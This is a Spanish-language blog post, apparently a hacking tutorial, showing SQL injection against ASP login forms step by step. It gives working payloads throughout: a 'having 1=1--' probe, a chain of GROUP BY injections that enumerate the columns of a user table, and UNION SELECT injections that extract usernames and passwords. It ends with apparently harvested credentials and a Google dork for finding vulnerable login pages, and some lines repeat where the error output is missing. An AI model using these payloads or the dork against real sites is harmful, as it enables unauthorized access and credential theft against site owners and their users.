Inyección SQL a Login ASP
La inyección SQL es el ataque vía web, que aprovecha errores en la
filtración de datos introducidos por el usuario, y que permiten a un
atacante, tener control de cierta aplicación.
En el en campo "Clave de Acceso" y "Password" del login escribimos:
Al hacerlo nos dara el seguiente error:
Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:
Hacemos la inyección y el siguiente error sera así:
Hacemos la inyección y el siguiente error sera así:
Hacemos la inyección y el siguiente error sera así:
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:
Hacemos la inyección y el siguiente error sera así:
Hacemos la inyección y el siguiente error sera así:
Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.
Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.
Curiosamente al hacer la inyección de esta forma tenemos el acceso:
' having 1= 1--
Al hacerlo nos dara el seguiente error:
' group by Usuario.Clave having 1 = 1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre having 1=1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--
Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.
Nuestra siguiente inyección sera de esta forma:
' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--
Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.
' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--
La inyección para que les arroje la password es:
' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--
Clave de Acceso: AHSACI
Password: AHSACI
Dork:
Dork:
inurl:login.asp
Posted By César Calderón
Amante de todo lo relacionado con la informática, GNU/Linux, Programador, Geek. Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores.
0 comentarios:
Publicar un comentario